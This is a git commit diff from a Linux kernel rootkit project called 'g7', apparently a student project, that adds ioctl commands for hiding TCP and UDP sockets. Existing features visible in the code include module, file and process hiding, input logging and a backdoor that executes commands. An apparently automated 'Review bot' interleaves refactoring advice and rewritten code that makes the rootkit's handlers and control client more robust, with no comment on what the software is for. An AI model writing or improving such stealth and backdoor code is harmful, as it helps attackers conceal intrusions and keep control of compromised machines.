commit 5520c73abf9e251b66a4dfd133a6976f2e3958fe
parent 9c38d818c12d8d446b4fae4ced617aa56f8cdbc2
Author: deurzen <m.deurzen@tum.de>
Date: Sun, 13 Dec 2020 01:03:21 +0100
adds {TCP,UDP} socket hiding handlers
Diffstat:
7 files changed, 110 insertions(+), 8 deletions(-)
diff --git a/src/channel.c b/src/channel.c
@@ -30,6 +30,8 @@ report_channels(void)
DEBUG_NOTICE("%-24s %#10lx\n", "FILEHIDE", G7_FILEHIDE);
DEBUG_NOTICE("%-24s %#10lx\n", "OPENHIDE", G7_OPENHIDE);
DEBUG_NOTICE("%-24s %#10lx\n", "HIDEPID", G7_PIDHIDE);
+ DEBUG_NOTICE("%-24s %#10lx\n", "TCPHIDE", G7_TCPHIDE);
+ DEBUG_NOTICE("%-24s %#10lx\n", "UDPHIDE", G7_UDPHIDE);
DEBUG_NOTICE("%-24s %#10lx\n", "BACKDOOR", G7_BACKDOOR);
DEBUG_NOTICE("%-24s %#10lx\n", "TOGGLEBD", G7_TOGGLEBD);
DEBUG_NOTICE("%-24s %#10lx\n", "LOGGING", G7_LOGGING);
@@ -45,6 +47,8 @@ detect_channel(unsigned cmd)
case G7_FILEHIDE: return (channel_t){ "FILEHIDE", handle_filehide };
case G7_OPENHIDE: return (channel_t){ "OPENHIDE", handle_openhide };
case G7_PIDHIDE: return (channel_t){ "HIDEPID", handle_pidhide };
+ case G7_TCPHIDE: return (channel_t){ "TCPHIDE", handle_tcphide };
+ case G7_UDPHIDE: return (channel_t){ "UDPHIDE", handle_udphide };
case G7_BACKDOOR: return (channel_t){ "BACKDOOR", handle_backdoor };
case G7_TOGGLEBD: return (channel_t){ "TOGGLEBD", handle_togglebd };
case G7_LOGGING: return (channel_t){ "LOGGING", handle_logging };
@@ -176,6 +180,58 @@ handle_pidhide(unsigned long arg)
}
int
+handle_tcphide(unsigned long arg)
+{
+ long sarg = (long)arg;
+
+ if (!sarg) {
+ // TODO toggle hiding off, perhaps also remove all sockets (tcp & udp) that are currently being hidden
+ rootkit.hiding_sockets = 0;
+ DEBUG_NOTICE("[g7] socket hiding off\n");
+ } else if (sarg < 0) {
+ // TODO unhide tcp socket for port `-sarg`
+ DEBUG_NOTICE("[g7] unhiding tcp socket with port %ld\n", -sarg);
+ } else if (sarg > 0) {
+ if (!rootkit.hiding_sockets) {
+ // TODO toggle hiding back on
+ DEBUG_NOTICE("[g7] socket hiding on\n");
+ }
+
+ // TODO hide tcp socket for port `sarg`
+ rootkit.hiding_sockets = 1;
+ DEBUG_NOTICE("[g7] hiding tcp socket with port %ld\n", sarg);
+ }
+
+ return 0;
+}
+
+int
+handle_udphide(unsigned long arg)
+{
+ long sarg = (long)arg;
+
+ if (!sarg) {
+ // TODO toggle hiding off, perhaps also remove all sockets (tcp & udp) that are currently being hidden
+ rootkit.hiding_sockets = 0;
+ DEBUG_NOTICE("[g7] socket hiding off\n");
+ } else if (sarg < 0) {
+ // TODO unhide udp socket for port `-sarg`
+ DEBUG_NOTICE("[g7] unhiding udp socket with port %ld\n", -sarg);
+ } else if (sarg > 0) {
+ if (!rootkit.hiding_sockets) {
+ // TODO toggle hiding back on
+ DEBUG_NOTICE("[g7] socket hiding on\n");
+ }
+
+ // TODO hide udp socket for port `sarg`
+ rootkit.hiding_sockets = 1;
+ DEBUG_NOTICE("[g7] hiding udp socket with port %ld\n", sarg);
+ }
+
+ return 0;
+}
+
+int
handle_backdoor(unsigned long arg)
{
char buf[BUFLEN];
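Review bot: handle_tcphide and handle_udphide are byte-for-byte the same apart from the protocol name in their log strings, and both read and write the single `rootkit.hiding_sockets` flag, so a `0` argument sent to either handler switches hiding off for both protocols while an unhide of the last hidden port leaves the flag set; if that coupling is intended it should be stated in a comment, otherwise the flag needs to be per-protocol or the TODOs resolved before this lands. Nothing bounds the positive branch to a valid port, and for `sarg == LONG_MIN` the `-sarg` on the unhide log line is signed overflow (UB) — a single range check such as `if (sarg < -65535 || sarg > 65535) return -EINVAL;` before the branches closes both (assuming the kernel errno header is already in scope here; otherwise use whatever error convention the other handlers follow). The shared body is better written once as a static helper taking the protocol name, with the two public handlers as one-line wrappers, and since `hiding_sockets` is declared `bool` in rootkit.h it should be assigned `false`/`true` to match the initializer in g7.c rather than `0`/`1`. handle_backdoor's body continues outside the hunk.

```c
/* Shared body of handle_tcphide/handle_udphide; `proto` is only used in log output. */
static int
handle_sockhide(unsigned long arg, const char *proto)
{
	long sarg = (long)arg;

	/* Reject anything that cannot be a port; also keeps -sarg below from overflowing. */
	if (sarg < -65535 || sarg > 65535) {
		DEBUG_NOTICE("[g7] %s port out of range: %ld\n", proto, sarg);
		return -EINVAL;
	}

	if (!sarg) {
		// TODO toggle hiding off, perhaps also remove all sockets (tcp & udp) that are currently being hidden
		rootkit.hiding_sockets = false;
		DEBUG_NOTICE("[g7] socket hiding off\n");
	} else if (sarg < 0) {
		// TODO unhide `proto` socket for port `-sarg`
		DEBUG_NOTICE("[g7] unhiding %s socket with port %ld\n", proto, -sarg);
	} else {
		if (!rootkit.hiding_sockets) {
			// TODO toggle hiding back on
			DEBUG_NOTICE("[g7] socket hiding on\n");
		}

		// TODO hide `proto` socket for port `sarg`
		rootkit.hiding_sockets = true;
		DEBUG_NOTICE("[g7] hiding %s socket with port %ld\n", proto, sarg);
	}

	return 0;
}

int
handle_tcphide(unsigned long arg)
{
	return handle_sockhide(arg, "tcp");
}

int
handle_udphide(unsigned long arg)
{
	return handle_sockhide(arg, "udp");
}
```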
diff --git a/src/channel.h b/src/channel.h
@@ -15,6 +15,8 @@ int handle_modhide(unsigned long);
int handle_filehide(unsigned long);
int handle_openhide(unsigned long);
int handle_pidhide(unsigned long);
+int handle_tcphide(unsigned long);
+int handle_udphide(unsigned long);
int handle_backdoor(unsigned long);
int handle_togglebd(unsigned long);
int handle_logging(unsigned long);
diff --git a/src/g7.c b/src/g7.c
@@ -40,11 +40,12 @@ static struct file_operations g7_fops =
rootkit_t rootkit = {
- .hiding_module = true,
- .hiding_files = true,
- .hiding_open = true,
- .hiding_pids = true,
- .logging_input = false,
+ .hiding_module = true,
+ .hiding_files = true,
+ .hiding_open = true,
+ .hiding_pids = true,
+ .hiding_sockets = true,
+ .logging_input = false,
.backdoor = BD_TTY,
};
diff --git a/src/ioctl.h b/src/ioctl.h
@@ -9,8 +9,10 @@
#define G7_FILEHIDE _IOR(G7_MAGIC_NUMBER, 0x2, char *)
#define G7_OPENHIDE _IOR(G7_MAGIC_NUMBER, 0x3, char *)
#define G7_PIDHIDE _IOR(G7_MAGIC_NUMBER, 0x4, char *)
-#define G7_BACKDOOR _IOR(G7_MAGIC_NUMBER, 0x5, char *)
-#define G7_TOGGLEBD _IOR(G7_MAGIC_NUMBER, 0x6, char *)
-#define G7_LOGGING _IOR(G7_MAGIC_NUMBER, 0x7, char *)
+#define G7_TCPHIDE _IOR(G7_MAGIC_NUMBER, 0x5, char *)
+#define G7_UDPHIDE _IOR(G7_MAGIC_NUMBER, 0x6, char *)
+#define G7_BACKDOOR _IOR(G7_MAGIC_NUMBER, 0x7, char *)
+#define G7_TOGGLEBD _IOR(G7_MAGIC_NUMBER, 0x8, char *)
+#define G7_LOGGING _IOR(G7_MAGIC_NUMBER, 0x9, char *)
#endif//_GROUP7_IOCTL_H
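Review bot: Renumbering G7_BACKDOOR, G7_TOGGLEBD and G7_LOGGING from 0x5–0x7 to 0x7–0x9 silently breaks every rkctl binary or script built against the previous header: an old client's `G7_BACKDOOR` request (0x5) is now dispatched as `G7_TCPHIDE` by detect_channel in channel.c, with whatever argument it carried. Ioctl numbers are a wire contract between module and client, so new commands should be appended rather than inserted: keep the three existing definitions at their original numbers and add `#define G7_TCPHIDE _IOR(G7_MAGIC_NUMBER, 0x8, char *)` and `#define G7_UDPHIDE _IOR(G7_MAGIC_NUMBER, 0x9, char *)`. If the renumbering is deliberate, a comment in this header saying the numbers are not stable across versions would at least tell readers the client must be rebuilt together with the module.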
diff --git a/src/rkctl/rkctl.c b/src/rkctl/rkctl.c
@@ -92,6 +92,32 @@ parse_input(int argc, char **argv)
if (ARGVCMP(1, "hidepid-off"))
return (cmd_t){ handle_pidhide, (void *)0 };
+ if (ARGVCMP(1, "socket")) {
+ ASSERT_ARGC(4, "socket <hide | unhide> <tcp | udp> <port>");
+
+ long arg;
+ if ((arg = strtol(argv[4], NULL, 10))) {
+ if (ARGVCMP(2, "hide")) {
+ if (ARGVCMP(3, "tcp"))
+ return (cmd_t){ handle_tcphide, (void *)arg };
+
+ if (ARGVCMP(3, "udp"))
+ return (cmd_t){ handle_udphide, (void *)arg };
+ }
+
+ if (ARGVCMP(2, "unhide")){
+ if (ARGVCMP(3, "tcp"))
+ return (cmd_t){ handle_tcphide, (void *)((-1) * (arg)) };
+
+ if (ARGVCMP(3, "udp"))
+ return (cmd_t){ handle_udphide, (void *)((-1) * (arg)) };
+ }
+ } else {
+ fprintf(stderr, "%s: invalid port `%s`\n", progname, argv[3]);
+ exit(1);
+ }
+ }
+
if (ARGVCMP(1, "backdoor")) {
ASSERT_ARGC(2, "backdoor <execve_command>");
return (cmd_t){ handle_backdoor, (void *)argv[2] };
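Review bot: The `else` branch reports `argv[3]` (the protocol) as the invalid port while the value actually parsed is `argv[4]`, and the parse itself is unchecked — `strtol(argv[4], NULL, 10)` accepts `80abc`, ignores ERANGE, and passes negative or >65535 values straight through, which the module-side handler then interprets as an unhide or as an out-of-range port rather than rejecting. A verb other than `hide`/`unhide` or a protocol other than `tcp`/`udp` also drops out of the block silently and parse_input keeps matching later commands with `argv[1]` still equal to `socket`. Parse with an end pointer and errno (which needs `<errno.h>` if this file does not already include it), bound the result to 1–65535, reject unknown verbs and protocols with a usage error, and write `(void *)((-1) * (arg))` as `(void *)(-arg)`. parse_input continues outside the hunk.

```c
	if (ARGVCMP(1, "socket")) {
		ASSERT_ARGC(4, "socket <hide | unhide> <tcp | udp> <port>");

		/* Full-string, range-checked parse: trailing garbage, overflow and 0 are all rejected. */
		char *end;
		errno = 0;
		long arg = strtol(argv[4], &end, 10);
		if (end == argv[4] || *end != '\0' || errno == ERANGE
		    || arg < 1 || arg > 65535) {
			fprintf(stderr, "%s: invalid port `%s`\n", progname, argv[4]);
			exit(1);
		}

		int (*handler)(void *) = NULL;
		if (ARGVCMP(3, "tcp"))
			handler = handle_tcphide;
		else if (ARGVCMP(3, "udp"))
			handler = handle_udphide;

		/* Negative port means unhide on the module side. */
		if (ARGVCMP(2, "unhide"))
			arg = -arg;
		else if (!ARGVCMP(2, "hide"))
			handler = NULL;

		if (!handler) {
			fprintf(stderr, "%s: usage: socket <hide | unhide> <tcp | udp> <port>\n", progname);
			exit(1);
		}

		return (cmd_t){ handler, (void *)arg };
	}
```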
@@ -160,6 +186,18 @@ handle_pidhide(void *arg)
}
int
+handle_tcphide(void *arg)
+{
+ return issue_ioctl(G7_TCPHIDE, (const char *)arg);
+}
+
+int
+handle_udphide(void *arg)
+{
+ return issue_ioctl(G7_UDPHIDE, (const char *)arg);
+}
+
+int
handle_backdoor(void *arg)
{
return issue_ioctl(G7_BACKDOOR, (const char *)arg);
diff --git a/src/rkctl/rkctl.h b/src/rkctl/rkctl.h
@@ -25,6 +25,8 @@ int handle_modhide(void *);
int handle_filehide(void *);
int handle_openhide(void *);
int handle_pidhide(void *);
+int handle_tcphide(void *);
+int handle_udphide(void *);
int handle_backdoor(void *);
int handle_shellbd(void *);
int handle_togglebd(void *);
diff --git a/src/rootkit.h b/src/rootkit.h
@@ -15,6 +15,7 @@ typedef struct {
bool hiding_files;
bool hiding_pids;
bool hiding_open;
+ bool hiding_sockets;
bool logging_input;
bd_state_t backdoor;
} rootkit_t;